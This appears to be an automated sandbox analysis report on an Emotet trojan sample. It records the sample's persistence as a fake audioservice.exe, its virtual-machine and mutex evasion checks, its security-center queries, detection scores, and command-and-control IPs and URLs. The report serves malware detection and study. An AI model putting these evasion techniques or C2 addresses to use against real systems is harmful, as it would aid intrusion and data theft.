Source: C:\Users\user\Desktop\pitEBNziGR.exe	Process created: C:\Users\user\Desktop\pitEBNziGR.exe C:\Users\user\Desktop\pitEBNziGR.exe
Source: unknown	Process created: C:\Windows\SysWOW64\audioservice.exe C:\Windows\SysWOW64\audioservice.exe
Source: C:\Windows\SysWOW64\audioservice.exe	Process created: C:\Windows\SysWOW64\audioservice.exe C:\Windows\SysWOW64\audioservice.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pitEBNziGR.exe	Process created: C:\Users\user\Desktop\pitEBNziGR.exe C:\Users\user\Desktop\pitEBNziGR.exe	Jump to behavior
Source: C:\Windows\SysWOW64\audioservice.exe	Process created: C:\Windows\SysWOW64\audioservice.exe C:\Windows\SysWOW64\audioservice.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: pitEBNziGR.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Code function: 0_2_00A81F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

0_2_00A81F40

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\audioservice.exe

Executable created and started: C:\Windows\SysWOW64\audioservice.exe

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

PE file moved: C:\Windows\SysWOW64\audioservice.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\pitEBNziGR.exe

File opened: C:\Windows\SysWOW64\audioservice.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-12612

Source: C:\Users\user\Desktop\pitEBNziGR.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

API coverage: 6.5 %

Source: C:\Windows\System32\svchost.exe TID: 5780

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\pitEBNziGR.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000008.00000002.462327310.0000024118CB0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000006.00000002.465111348.0000028F33062000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp, svchost.exe, 00000006.00000002.464973215.0000028F3304C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.461443923.000001FA8E202000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000008.00000002.462327310.0000024118CB0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.462109237.0000028F2D82A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW=
Source: svchost.exe, 00000008.00000002.462327310.0000024118CB0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWx"
Source: svchost.exe, 00000007.00000002.461491367.000001FA8E228000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.461875734.000001FB4822A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000008.00000002.462327310.0000024118CB0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\audioservice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Code function: 0_2_00A81F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

0_2_00A81F40

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Code function: 0_2_00A81BE0 mov eax, dword ptr fs:[00000030h]

0_2_00A81BE0

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Code function: 0_2_00A815B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

0_2_00A815B0

Source: svchost.exe, 00000009.00000002.461898357.0000017862590000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000009.00000002.461898357.0000017862590000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000009.00000002.461898357.0000017862590000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000009.00000002.461898357.0000017862590000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\pitEBNziGR.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\audioservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\pitEBNziGR.exe

Code function: 0_2_00A88D50 RtlGetVersion,GetNativeSystemInfo,

0_2_00A88D50

Source: C:\Windows\SysWOW64\audioservice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 0000000D.00000002.461551398.00000217B463D000.00000004.00000001.sdmp	Binary or memory string: &@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000D.00000002.461608468.00000217B4702000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: pitEBNziGR.exe, type: SAMPLE
Source: Yara match	File source: 00000002.00000002.202612718.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.201565611.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.461283657.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.202311649.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.195720063.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.194827594.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.202853899.0000000000A81000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.audioservice.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.pitEBNziGR.exe.a80000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection2	Masquerading121	OS Credential Dumping	Security Software Discovery51	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pitEBNziGR.exe	83%	Virustotal		Browse
pitEBNziGR.exe	97%	ReversingLabs	Win32.Trojan.Emotet
pitEBNziGR.exe	100%	Avira	TR/Crypt.XPACK.Gen
pitEBNziGR.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.audioservice.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.audioservice.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.pitEBNziGR.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.audioservice.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.pitEBNziGR.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.audioservice.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.pitEBNziGR.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.pitEBNziGR.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://173.230.145.224:8080/	6%	Virustotal		Browse
http://173.230.145.224:8080/	0%	Avira URL Cloud	safe
https://79.172.249.82:443/	3%	Virustotal		Browse
https://79.172.249.82:443/	0%	Avira URL Cloud	safe
http://193.169.54.12:8080/	6%	Virustotal		Browse
http://193.169.54.12:8080/	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://173.230.145.224:8080/gM#	0%	Avira URL Cloud	safe
http://193.169.54.12:8080/_M	0%	Avira URL Cloud	safe
http://193.169.54.12:8080/ux	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
http://173.230.145.224:8080/TM	0%	Avira URL Cloud	safe
http://79.172.249.82:443/	0%	Avira URL Cloud	safe
http://173.230.145.224:8080/l	0%	Avira URL Cloud	safe
http://193.169.54.12:8080/5	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://79.172.249.82:443/	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
http://173.230.145.224:8080/	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000003.308146538.000001939C645000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000B.00000002.308394226.000001939C64D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000003.286370110.000001939C631000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
http://193.169.54.12:8080/	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000B.00000003.308142924.000001939C657000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000002.308355210.000001939C613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000B.00000003.308149953.000001939C641000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000002.308394226.000001939C64D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000003.286370110.000001939C631000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
http://173.230.145.224:8080/gM#	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://193.169.54.12:8080/_M	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	false		high
http://193.169.54.12:8080/ux	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000B.00000003.286370110.000001939C631000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000003.308142924.000001939C657000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000006.00000002.464505561.0000028F32EC0000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000B.00000003.308149953.000001939C641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	svchost.exe, 00000006.00000002.462241785.0000028F2D8A9000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000B.00000002.308394226.000001939C64D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308149953.000001939C641000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308146538.000001939C645000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000B.00000002.308379172.000001939C63A000.00000004.00000001.sdmp	false		high
http://173.230.145.224:8080/TM	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000003.308142924.000001939C657000.00000004.00000001.sdmp	false		high
http://79.172.249.82:443/	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://173.230.145.224:8080/l	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000B.00000002.308355210.000001939C613000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000B.00000003.308104948.000001939C661000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000002.308383976.000001939C63E000.00000004.00000001.sdmp	false		high
http://193.169.54.12:8080/5	audioservice.exe, 00000003.00000002.461836346.00000000010C8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://%s.dnet.xboxlive.com	svchost.exe, 00000008.00000002.461881870.0000024118645000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000003.308123717.000001939C65C000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.169.54.12	unknown	Germany	49464	ICFSYSTEMSDE	false
173.230.145.224	unknown	United States	63949	LINODE-APLinodeLLCUS	false
79.172.249.82	unknown	Hungary	43711	SZERVERNET-HU-ASHU	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	376866
Start date:	27.03.2021
Start time:	15:01:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pitEBNziGR (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/8@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.7% (good quality ratio 39%) Quality average: 79% Quality standard deviation: 30.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 40.88.32.150, 204.79.197.200, 13.107.21.200, 52.255.188.83, 20.82.210.154, 23.57.80.111, 93.184.221.240, 92.122.213.194, 92.122.213.247, 20.50.102.62, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:03:05	API Interceptor	2x Sleep call for process: svchost.exe modified
15:04:20	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.169.54.12	_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12:8080/
